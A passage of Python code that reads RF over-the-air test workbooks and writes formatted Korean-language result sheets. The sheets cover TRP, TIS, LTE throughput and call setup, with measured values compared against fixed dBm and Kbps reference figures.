list_lte_trp[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TRP\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D26\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D7\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D26\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D26\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, 
bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 16.75, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [5, 9, 16, 21]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 7, 10, 11, 12, 13, 14, 17, 22, 23, 24, 25, 26]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TRP\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TIS Tab\n def tis_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_tis = []\n list_lte_tis = []\n list_wcdma_tis = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_tis.append(self.check_num(sheet_in['J7'].value))\n list_5g_tis.append(self.check_num(sheet_in['J8'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_tis.append(self.check_num(sheet_in['L17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D10'].value))\n list_lte_tis.append(self.check_num(sheet_in['H17'].value))\n list_lte_tis.append(self.check_num(sheet_in['H10'].value))\n list_lte_tis.append(self.check_num(sheet_in['N17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F10'].value))\n list_lte_tis.append(self.check_num(sheet_in['J17'].value))\n list_lte_tis.append(self.check_num(sheet_in['J10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_tis.append(self.check_num(sheet_in['E9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TIS']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TIS 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TIS'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'SISO (n78)'\n sheet_out['B6'] = '-'\n sheet_out['C6'] = list_5g_tis[0] + 'dBm'\n sheet_out['D6'] = '-'\n\n # sheet row 8 and 14 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '-92.00dBm'\n sheet_out['C10'] = list_lte_tis[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_tis[0])) - 92.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(92.00, list_lte_tis[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '-91.00dBm'\n sheet_out['C11'] = list_lte_tis[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_tis[1])) - 91.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(91.00, list_lte_tis[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = 
'-87.00dBm'\n sheet_out['C12'] = list_lte_tis[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_tis[2])) - 87.00, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(87.00, list_lte_tis[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '-90.00dBm'\n sheet_out['C13'] = list_lte_tis[3] + 'dBm'\n # sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_tis[3])) - 90.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(90.00, list_lte_tis[3]) + 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '-93.00dBm'\n sheet_out['C14'] = list_lte_tis[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_tis[4])) - 93.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(93.00, list_lte_tis[4]) + 'dBm'\n\n # sheet row 15 and 17 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['D16'] = '비교'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '-104.00dBm'\n sheet_out['C17'] = list_wcdma_tis[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_tis[0])) - 104.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(104.00, list_wcdma_tis[0]) + 'dBm'\n\n # sheet row 19 and 22 handle\n sheet_out['A19'] = '▣ MIMO TIS'\n sheet_out['A20'] = ' - 5G'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['D21'] = '비교'\n sheet_out['A22'] = 'MIMO 4X4 (n78)'\n sheet_out['B22'] = '-'\n sheet_out['C22'] = list_5g_tis[1] + 'dBm'\n sheet_out['D22'] = '-'\n\n # sheet row 24 and 30 handle\n sheet_out['A24'] = ' - LTE'\n sheet_out['A25'] = '구분'\n sheet_out['B25'] = '기준(RHP)'\n sheet_out['C25'] = '측정결과'\n sheet_out['D25'] = '비교'\n sheet_out['A26'] = 'Band 1 15M'\n sheet_out['B26'] = '-86.00dBm'\n sheet_out['C26'] = list_lte_tis[5] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_tis[5])) - 86.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(86.00, list_lte_tis[5]) + 'dBm'\n sheet_out['A27'] = 'Band 3 20M'\n sheet_out['B27'] = '-86.00dBm'\n sheet_out['C27'] = list_lte_tis[6] + 'dBm'\n # sheet_out['D27'] = self.check_num(abs(round(abs(float(list_lte_tis[6])) - 86.00, 2))) + 'dBm'\n sheet_out['D27'] = self.cal_comparison(86.00, list_lte_tis[6]) + 'dBm'\n sheet_out['A28'] = 'Band 5 10M'\n sheet_out['B28'] = '-82.50dBm'\n sheet_out['C28'] = list_lte_tis[7] + 'dBm'\n # sheet_out['D28'] = self.check_num(abs(round(abs(float(list_lte_tis[7])) - 82.50, 2))) + 'dBm'\n sheet_out['D28'] = self.cal_comparison(82.50, list_lte_tis[7]) + 'dBm'\n sheet_out['A29'] = 'Band 7 20M'\n sheet_out['B29'] = '-84.00dBm'\n sheet_out['C29'] = list_lte_tis[8] + 'dBm'\n # sheet_out['D29'] = self.check_num(abs(round(abs(float(list_lte_tis[8])) - 84.00, 2))) + 'dBm'\n sheet_out['D29'] = self.cal_comparison(84.00, list_lte_tis[8]) + 'dBm'\n sheet_out['A30'] = 'Band 7 10M'\n sheet_out['B30'] = '-87.00dBm'\n sheet_out['C30'] = list_lte_tis[9] + 'dBm'\n # sheet_out['D30'] = self.check_num(abs(round(abs(float(list_lte_tis[9])) - 87.00, 2))) + 'dBm'\n sheet_out['D30'] = self.cal_comparison(87.00, list_lte_tis[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TIS\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D30\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = 
self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D6\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D22\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A25:D30\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D30\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n\n for i in [5, 9, 16, 21, 25]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 10, 11, 12, 13, 14, 17, 22, 26, 27, 28, 29, 30]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TIS\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 속도 Tab\n def spd_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_lte_spd = []\n\n # get data from wb_input\n sheet_in = wb_input['LTE OTA']\n # MIMO\n list_lte_spd.append(self.check_num(sheet_in['I25'].value))\n list_lte_spd.append(self.check_num(sheet_in['J25'].value))\n list_lte_spd.append(self.check_num(sheet_in['K25'].value))\n list_lte_spd.append(self.check_num(sheet_in['F25'].value))\n list_lte_spd.append(self.check_num(sheet_in['G25'].value))\n list_lte_spd.append(self.check_num(sheet_in['H25'].value))\n list_lte_spd.append(self.check_num(sheet_in['C25'].value))\n list_lte_spd.append(self.check_num(sheet_in['D25'].value))\n list_lte_spd.append(self.check_num(sheet_in['E25'].value))\n list_lte_spd.append(self.check_num(sheet_in['L25'].value))\n list_lte_spd.append(self.check_num(sheet_in['M25'].value))\n list_lte_spd.append(self.check_num(sheet_in['N25'].value))\n list_lte_spd.append(self.check_num(sheet_in['O25'].value))\n list_lte_spd.append(self.check_num(sheet_in['P25'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q25'].value))\n # CA\n list_lte_spd.append(self.check_num(sheet_in['C33'].value))\n list_lte_spd.append(self.check_num(sheet_in['D33'].value))\n list_lte_spd.append(self.check_num(sheet_in['E33'].value))\n list_lte_spd.append(self.check_num(sheet_in['F33'].value))\n list_lte_spd.append(self.check_num(sheet_in['G33'].value))\n list_lte_spd.append(self.check_num(sheet_in['H33'].value))\n list_lte_spd.append(self.check_num(sheet_in['I33'].value))\n list_lte_spd.append(self.check_num(sheet_in['J33'].value))\n list_lte_spd.append(self.check_num(sheet_in['K33'].value))\n list_lte_spd.append(self.check_num(sheet_in['L33'].value))\n list_lte_spd.append(self.check_num(sheet_in['M33'].value))\n list_lte_spd.append(self.check_num(sheet_in['N33'].value))\n list_lte_spd.append(self.check_num(sheet_in['O33'].value))\n list_lte_spd.append(self.check_num(sheet_in['P33'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q33'].value))\n list_lte_spd.append(self.check_num(sheet_in['R33'].value))\n list_lte_spd.append(self.check_num(sheet_in['S33'].value))\n list_lte_spd.append(self.check_num(sheet_in['T33'].value))\n\n #option setting wb.output\n sheet_out = wb_output['속도']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '속도 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ MIMO 속도'\n sheet_out['A4'] = ' - LTE'\n\n # sheet row 5 and 20 handle\n sheet_out['A5'] = '구분'\n sheet_out.merge_cells('B5:C5')\n sheet_out['B5'] = '기준(Free)'\n sheet_out['D5'] = '측정결과'\n sheet_out['E5'] = '비교'\n\n sheet_out.merge_cells('A6:A8')\n sheet_out['A6'] = 'Band 1 15M(MCS28)'\n sheet_out['B6'] = 'RSSI'\n sheet_out['B7'] = '속도(Absolute)'\n sheet_out['B8'] = 'BLER'\n sheet_out['C6'] = '-61.00dBm'\n sheet_out['C7'] = '87700Kbps'\n sheet_out['C8'] = '20.00%'\n sheet_out['D6'] = list_lte_spd[0] + 'dBm'\n sheet_out['D7'] = list_lte_spd[1] + 'Kbps'\n sheet_out['D8'] = list_lte_spd[2] + '%'\n # sheet_out['E6'] = self.check_num(abs(round(abs(float(list_lte_spd[0])) - 61.00, 2))) + 'dBm'\n # sheet_out['E7'] = self.check_num(abs(round(abs(float(list_lte_spd[1])) - 87700, 2))) + 'Kbps'\n # sheet_out['E8'] = self.check_num(abs(round(abs(float(list_lte_spd[2])) - 20.00, 2))) + '%'\n 
sheet_out['E6'] = self.cal_comparison(61.00, list_lte_spd[0]) + 'dBm'\n sheet_out['E7'] = self.cal_comparison(87700.00, list_lte_spd[1]) + 'Kbps'\n sheet_out['E8'] = self.cal_comparison(20.00, list_lte_spd[2]) + '%'\n\n sheet_out.merge_cells('A9:A11')\n sheet_out['A9'] = 'Band 3 20M(MCS28)'\n sheet_out['B9'] = 'RSSI'\n sheet_out['B10'] = '속도(Absolute)'\n sheet_out['B11'] = 'BLER'\n sheet_out['C9'] = '-61.00dBm'\n sheet_out['C10'] = '119900Kbps'\n sheet_out['C11'] = '20.00%'\n sheet_out['D9'] = list_lte_spd[3] + 'dBm'\n sheet_out['D10'] = list_lte_spd[4] + 'Kbps'\n sheet_out['D11'] = list_lte_spd[5] + '%'\n # sheet_out['E9'] = self.check_num(abs(round(abs(float(list_lte_spd[3])) - 61.00, 2))) + 'dBm'\n # sheet_out['E10'] = self.check_num(abs(round(abs(float(list_lte_spd[4])) - 119900, 2))) + 'Kbps'\n # sheet_out['E11'] = self.check_num(abs(round(abs(float(list_lte_spd[5])) - 20.00, 2))) + '%'\n sheet_out['E9'] = self.cal_comparison(61.00, list_lte_spd[3]) + 'dBm'\n sheet_out['E10'] = self.cal_comparison(119900.00, list_lte_spd[4]) + 'Kbps'\n sheet_out['E11'] = self.cal_comparison(20.00, list_lte_spd[5]) + '%'\n\n sheet_out.merge_cells('A12:A14')\n sheet_out['A12'] = 'Band 5 10M(MCS27)'\n sheet_out['B12'] = 'RSSI'\n sheet_out['B13'] = '속도(Absolute)'\n sheet_out['B14'] = 'BLER'\n sheet_out['C12'] = '-60.00dBm'\n sheet_out['C13'] = '50300Kbps'\n sheet_out['C14'] = '20.00%'\n sheet_out['D12'] = list_lte_spd[6] + 'dBm'\n sheet_out['D13'] = list_lte_spd[7] + 'Kbps'\n sheet_out['D14'] = list_lte_spd[8] + '%'\n # sheet_out['E12'] = self.check_num(abs(round(abs(float(list_lte_spd[6])) - 60.00, 2))) + 'dBm'\n # sheet_out['E13'] = self.check_num(abs(round(abs(float(list_lte_spd[7])) - 50300, 2))) + 'Kbps'\n # sheet_out['E14'] = self.check_num(abs(round(abs(float(list_lte_spd[8])) - 20.00, 2))) + '%'\n sheet_out['E12'] = self.cal_comparison(60.00, list_lte_spd[6]) + 'dBm'\n sheet_out['E13'] = self.cal_comparison(50300.00, list_lte_spd[7]) + 'Kbps'\n sheet_out['E14'] = self.cal_comparison(20.00, list_lte_spd[8]) + '%'\n\n sheet_out.merge_cells('A15:A17')\n sheet_out['A15'] = 'Band 7 20M(MCS28)'\n sheet_out['B15'] = 'RSSI'\n sheet_out['B16'] = '속도(Absolute)'\n sheet_out['B17'] = 'BLER'\n sheet_out['C15'] = '-60.00dBm'\n sheet_out['C16'] = '119900Kbps'\n sheet_out['C17'] = '20.00%'\n sheet_out['D15'] = list_lte_spd[9] + 'dBm'\n sheet_out['D16'] = list_lte_spd[10] + 'Kbps'\n sheet_out['D17'] = list_lte_spd[11] + '%'\n # sheet_out['E15'] = self.check_num(abs(round(abs(float(list_lte_spd[9])) - 60.00, 2))) + 'dBm'\n # sheet_out['E16'] = self.check_num(abs(round(abs(float(list_lte_spd[10])) - 119900, 2))) + 'Kbps'\n # sheet_out['E17'] = self.check_num(abs(round(abs(float(list_lte_spd[11])) - 20.00, 2))) + '%'\n sheet_out['E15'] = self.cal_comparison(60.00, list_lte_spd[9]) + 'dBm'\n sheet_out['E16'] = self.cal_comparison(119900.00, list_lte_spd[10]) + 'Kbps'\n sheet_out['E17'] = self.cal_comparison(20.00, list_lte_spd[11]) + '%'\n\n sheet_out.merge_cells('A18:A20')\n sheet_out['A18'] = 'Band 7 10M(MCS27)'\n sheet_out['B18'] = 'RSSI'\n sheet_out['B19'] = '속도(Absolute)'\n sheet_out['B20'] = 'BLER'\n sheet_out['C18'] = '-60.00dBm'\n sheet_out['C19'] = '50300Kbps'\n sheet_out['C20'] = '20.00%'\n sheet_out['D18'] = list_lte_spd[12] + 'dBm'\n sheet_out['D19'] = list_lte_spd[13] + 'Kbps'\n sheet_out['D20'] = list_lte_spd[14] + '%'\n # sheet_out['E18'] = self.check_num(abs(round(abs(float(list_lte_spd[12])) - 60.00, 2))) + 'dBm'\n # sheet_out['E19'] = self.check_num(abs(round(abs(float(list_lte_spd[13])) - 50300, 
2))) + 'Kbps'\n # sheet_out['E20'] = self.check_num(abs(round(abs(float(list_lte_spd[14])) - 20.00, 2))) + '%'\n sheet_out['E18'] = self.cal_comparison(60.00, list_lte_spd[12]) + 'dBm'\n sheet_out['E19'] = self.cal_comparison(50300.00, list_lte_spd[13]) + 'Kbps'\n sheet_out['E20'] = self.cal_comparison(20.00, list_lte_spd[14]) + '%'\n\n\n # 22 ~ 23 row\n sheet_out['A22'] = '▣ CA 속도'\n sheet_out['A23'] = ' - LTE'\n\n # sheet row 24 and 42 handle\n sheet_out['A24'] = '구분'\n sheet_out.merge_cells('B24:C24')\n sheet_out['B24'] = '기준(Free)'\n sheet_out['D24'] = '측정결과'\n sheet_out['E24'] = '비교'\n\n sheet_out.merge_cells('A25:A27')\n sheet_out['A25'] = '2CA : B3+B5(MCS28)'\n sheet_out['B25'] = 'RSSI'\n sheet_out['B26'] = '속도(Absolute)'\n sheet_out['B27'] = 'BLER'\n sheet_out['C25'] = '-58.00dBm'\n sheet_out['C26'] = '178390Kbps'\n sheet_out['C27'] = '-'\n sheet_out['D25'] = list_lte_spd[15] + 'dBm'\n sheet_out['D26'] = list_lte_spd[16] + 'Kbps'\n sheet_out['D27'] = list_lte_spd[17] + '%'\n # sheet_out['E25'] = self.check_num(abs(round(abs(float(list_lte_spd[15])) - 58.00, 2))) + 'dBm'\n # sheet_out['E26'] = self.check_num(abs(round(abs(float(list_lte_spd[16])) - 178390, 2))) + 'Kbps'\n sheet_out['E25'] = self.cal_comparison(58.00, list_lte_spd[15]) + 'dBm'\n sheet_out['E26'] = self.cal_comparison(178390.00, list_lte_spd[16]) + 'Kbps'\n sheet_out['E27'] = '-'\n\n sheet_out.merge_cells('A28:A30')\n sheet_out['A28'] = '3CA : B7(20M)+B3+B1(MCS28)'\n sheet_out['B28'] = 'RSSI'\n sheet_out['B29'] = '속도(Absolute)'\n sheet_out['B30'] = 'BLER'\n sheet_out['C28'] = '-58.00dBm'\n sheet_out['C29'] = '327500Kbps'\n sheet_out['C30'] = '-'\n sheet_out['D28'] = list_lte_spd[18] + 'dBm'\n sheet_out['D29'] = list_lte_spd[19] + 'Kbps'\n sheet_out['D30'] = list_lte_spd[20] + '%'\n # sheet_out['E28'] = self.check_num(abs(round(abs(float(list_lte_spd[18])) - 58.00, 2))) + 'dBm'\n # sheet_out['E29'] = self.check_num(abs(round(abs(float(list_lte_spd[19])) - 327500, 2))) + 'Kbps'\n sheet_out['E28'] = self.cal_comparison(58.00, list_lte_spd[18]) + 'dBm'\n sheet_out['E29'] = self.cal_comparison(327500.00, list_lte_spd[19]) + 'Kbps'\n sheet_out['E30'] = '-'\n\n sheet_out.merge_cells('A31:A33')\n sheet_out['A31'] = '3CA : B7(20M)+B3+B5(MCS28)'\n sheet_out['B31'] = 'RSSI'\n sheet_out['B32'] = '속도(Absolute)'\n sheet_out['B33'] = 'BLER'\n sheet_out['C31'] = '-58.00dBm'\n sheet_out['C32'] = '298300Kbps'\n sheet_out['C33'] = '-'\n sheet_out['D31'] = list_lte_spd[21] + 'dBm'\n sheet_out['D32'] = list_lte_spd[22] + 'Kbps'\n sheet_out['D33'] = list_lte_spd[23] + '%'\n # sheet_out['E31'] = self.check_num(abs(round(abs(float(list_lte_spd[21])) - 58.00, 2))) + 'dBm'\n # sheet_out['E32'] = self.check_num(abs(round(abs(float(list_lte_spd[22])) - 298300, 2))) + 'Kbps'\n sheet_out['E31'] = self.cal_comparison(58.00, list_lte_spd[21]) + 'dBm'\n sheet_out['E32'] = self.cal_comparison(298300.00, list_lte_spd[22]) + 'Kbps'\n sheet_out['E33'] = '-'\n\n sheet_out.merge_cells('A34:A36')\n sheet_out['A34'] = '3CA : B7(20M)+B3+B7(MCS28)'\n sheet_out['B34'] = 'RSSI'\n sheet_out['B35'] = '속도(Absolute)'\n sheet_out['B36'] = 'BLER'\n sheet_out['C34'] = '-58.00dBm'\n sheet_out['C35'] = '298300Kbps'\n sheet_out['C36'] = '-'\n sheet_out['D34'] = list_lte_spd[24] + 'dBm'\n sheet_out['D35'] = list_lte_spd[25] + 'Kbps'\n sheet_out['D36'] = list_lte_spd[26] + '%'\n # sheet_out['E34'] = self.check_num(abs(round(abs(float(list_lte_spd[24])) - 58.00, 2))) + 'dBm'\n # sheet_out['E35'] = self.check_num(abs(round(abs(float(list_lte_spd[25])) - 298300, 2))) + 
'Kbps'\n                sheet_out['E34'] = self.cal_comparison(58.00, list_lte_spd[24]) + 'dBm'\n                sheet_out['E35'] = self.cal_comparison(298300.00, list_lte_spd[25]) + 'Kbps'\n                sheet_out['E36'] = '-'\n\n                sheet_out.merge_cells('A37:A39')\n                sheet_out['A37'] = '4CA : B7(20M)+B3+B5+B1(MCS28)'\n                sheet_out['B37'] = 'RSSI'\n                sheet_out['B38'] = '속도(Absolute)'\n                sheet_out['B39'] = 'BLER'\n                sheet_out['C37'] = '-57.00dBm'\n                sheet_out['C38'] = '386000Kbps'\n                sheet_out['C39'] = '-'\n                sheet_out['D37'] = list_lte_spd[27] + 'dBm'\n                sheet_out['D38'] = list_lte_spd[28] + 'Kbps'\n                sheet_out['D39'] = list_lte_spd[29] + '%'\n                # sheet_out['E37'] = self.check_num(abs(round(abs(float(list_lte_spd[27])) - 57.00, 2))) + 'dBm'\n                # sheet_out['E38'] = self.check_num(abs(round(abs(float(list_lte_spd[28])) - 386000, 2))) + 'Kbps'\n                sheet_out['E37'] = self.cal_comparison(57.00, list_lte_spd[27]) + 'dBm'\n                sheet_out['E38'] = self.cal_comparison(386000.00, list_lte_spd[28]) + 'Kbps'\n                sheet_out['E39'] = '-'\n\n                sheet_out.merge_cells('A40:A42')\n                sheet_out['A40'] = '5CA : B7+B3+B5+B1+B7(MCS28)'\n                sheet_out['B40'] = 'RSSI'\n                sheet_out['B41'] = '속도(Absolute)'\n                sheet_out['B42'] = 'BLER'\n                sheet_out['C40'] = '-56.00dBm'\n                sheet_out['C41'] = '444500Kbps'\n                sheet_out['C42'] = '-'\n                sheet_out['D40'] = list_lte_spd[30] + 'dBm'\n                sheet_out['D41'] = list_lte_spd[31] + 'Kbps'\n                sheet_out['D42'] = list_lte_spd[32] + '%'\n                # sheet_out['E40'] = self.check_num(abs(round(abs(float(list_lte_spd[30])) - 56.00, 2))) + 'dBm'\n                # sheet_out['E41'] = self.check_num(abs(round(abs(float(list_lte_spd[31])) - 444500, 2))) + 'Kbps'\n                sheet_out['E40'] = self.cal_comparison(56.00, list_lte_spd[30]) + 'dBm'\n                sheet_out['E41'] = self.cal_comparison(444500.00, list_lte_spd[31]) + 'Kbps'\n                sheet_out['E42'] = '-'\n\n                self.setPrintText('/s {}번 파일 \"속도\" 데이터 입력 완료 /e'.format(idx+1))\n\n                # set temp data\n\n                if self.opFlag:\n\n                    # all cell alignment adjust\n                    for mCell in sheet_out[\"A1:E42\"]:\n                        for cell in mCell:\n                            cell.alignment = self.general_alignment\n                    # top alignment adjust\n                    sheet_out['A3'].alignment = self.top_alignment\n                    sheet_out['A4'].alignment = self.top_alignment\n                    sheet_out['A22'].alignment = self.top_alignment\n                    sheet_out['A23'].alignment = self.top_alignment\n\n                    # all cell border adjust\n                    for mCell in sheet_out[\"A5:E20\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n\n                    # all cell border adjust\n                    for mCell in sheet_out[\"A24:E42\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n\n                    # all cell font adjust\n                    for mCell in sheet_out[\"A3:E42\"]:\n                        for cell in mCell:\n                            cell.font = self.index_font\n\n                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n                    # each column width adjust\n                    sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n                    sheet_width_list = [20.63, 14, 14, 17, 15]\n\n                    for i in range(len(sheet_cell_list)):\n                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n                    sheet_out.row_dimensions[1].height = 45\n\n                    # Set Pattern Fill\n                    for i in [6, 9, 12, 15, 18, 25, 28, 31, 34, 37, 40]:\n                        sheet_out['A' + str(i)].fill = self.gray_fill\n\n                    for col in ['A', 'B', 'D', 'E']:\n                        sheet_out[col + '5'].fill = self.brown_fill\n                        sheet_out[col + '24'].fill = self.brown_fill\n\n                    for i in range(6, 21):\n                        sheet_out['B'+str(i)].fill = self.apricot_fill\n                        sheet_out['C'+str(i)].fill = self.apricot_fill\n\n                    for i in range(25, 43):\n                        sheet_out['B'+str(i)].fill = self.apricot_fill\n                        sheet_out['C'+str(i)].fill = self.apricot_fill\n\n                self.currentRow = self.currentRow + 1\n                self.setPrintText('/s {}번 파일 \"속도\" 시트 스타일 적용 완료 
/e'.format(idx+1))\n                # save file\n                wb_output.save(self.list_out_files[idx])\n        except:\n            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n            self.end_count = \"y\"\n            self.end_flag.emit()\n\n    # Call Setup Tab\n    def call_generate_data(self):\n\n        try:\n            for idx, item in enumerate(self.list_files):\n\n                wb_input = openpyxl.load_workbook(item, data_only=True)\n                wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n                call_val = ''\n\n                # get data from wb_input\n                sheet_in = wb_input['Call Test']\n\n                call_val = self.check_num(sheet_in['D8'].value)\n\n                #option setting wb.output\n                sheet_out = wb_output['Call Setup Test']\n                # sheet row 2 handle\n                sheet_out.merge_cells('A1:C1')\n                sheet_out['A1'] = 'Call Setup Test 결과'\n\n                # 2~4 row\n                sheet_out['A2'] = ' - WCDMA Call Setup Test'\n                sheet_out['A3'] = '구분'\n                sheet_out['B3'] = '기준'\n                sheet_out['C3'] = '측정결과'\n                sheet_out['D3'] = '비교'\n                sheet_out['A4'] = 'Band 1'\n                sheet_out['B4'] = ' -104.5dBm 이하'\n                sheet_out['C4'] = 